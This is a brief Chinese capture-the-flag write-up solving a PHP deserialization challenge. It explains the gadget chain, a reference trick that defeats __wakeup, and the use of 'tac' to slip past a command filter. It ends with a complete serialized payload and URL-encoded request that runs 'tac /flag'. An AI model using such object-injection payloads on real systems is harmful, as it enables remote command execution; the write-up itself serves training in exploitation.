根据类名提示,反序列化的链子应该是:start-hello-world-hack
关键点在于hack类中weapon的值在经过__weakup赋值之后要怎么修改。
在wp.php中有这么一句:
$a -> refer = &$a -> weapon;
将weapon的指针赋值给refer,在程序对refer进行赋值的时候,就相当于对weapon赋值,也就能成功控制执行的命令了。
程序中过滤了一部分的查看文件内容的命令,但是还有个漏网之鱼tac,最终生成的payload为:
O:5:"start":2:{s:4:"name";N;s:4:"code";O:5:"hello":3:{s:5:"first";N;s:6:"second";N;s:7:"message";O:5:"world":2:{s:6:"bridge";O:5:"world":2:{s:6:"bridge";N;s:5:"dream";O:4:"hack":3:{s:6:"weapon";N;s:5:"refer";R:10;s:4:"ence";s:9:"tac /flag";}}s:5:"dream";N;}}}
访问/?cmd=O:5:%22start%22:2:{s:4:%22name%22;N;s:4:%22code%22;O:5:%22hello%22:3:{s:5:%22first%22;N;s:6:%22second%22;N;s:7:%22message%22;O:5:%22world%22:2:{s:6:%22bridge%22;O:5:%22world%22:2:{s:6:%22bridge%22;N;s:5:%22dream%22;O:4:%22hack%22:3:{s:6:%22weapon%22;N;s:5:%22refer%22;R:10;s:4:%22ence%22;s:9:%22tac%20/flag%22;}}s:5:%22dream%22;N;}}}即可得到flag